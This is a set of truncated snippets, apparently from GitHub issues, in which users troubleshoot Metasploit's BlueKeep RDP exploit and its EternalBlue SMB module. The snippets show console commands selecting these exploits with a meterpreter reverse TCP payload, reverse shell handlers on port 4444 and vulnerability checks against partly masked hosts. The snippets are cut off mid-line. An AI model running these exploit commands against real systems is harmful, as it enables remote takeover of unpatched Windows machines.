-
[*] Started reverse TCP handler on 172.31.23.143:4444
[*] IP:3389 - Detected RDP on IP:3389 (Windows version: 6.1.7600) (Requires NLA: No)
[+] IP:3389 - The target is vulnerable.
[-] IP:33…
-
I'm using kali 2020.4 and I'm trying to run the following script
```
use exploit/windows/rdp/rdp_bluekeep
set payload windows/x64/meterpreter/reverse_tcp
setg autorunscript multi_console_command…
-
> Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
This is also the case when I try a physical machine.
_Originally posted by @a62rzn in https://github.com/rapid7/metasp…
-
## My Setup
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set forceexploit true
**forceexploit => true**
msf5 exploit(windows/smb/ms17…
-
[] Started reverse TCP handler on 10.0.1.4:4444
[] 192.168.10.11:3389 - Detected RDP on 2x4.1x1.14.x5:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.10.11:3389 - The target is vulne…
-
+] xx.xx.xxx.xxx:3389 - The target is vulnerable.
[-] xx.xxx.xxx.xxx:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no sessi…
-
msf5 exploit(windows/cve_2019_0708_bluekeep_rce) > version
Framework: 5.0.46-dev
Console : 5.0.46-dev
Using the latest version I'm getting this error on every attempted execution:
[+] xx.xx…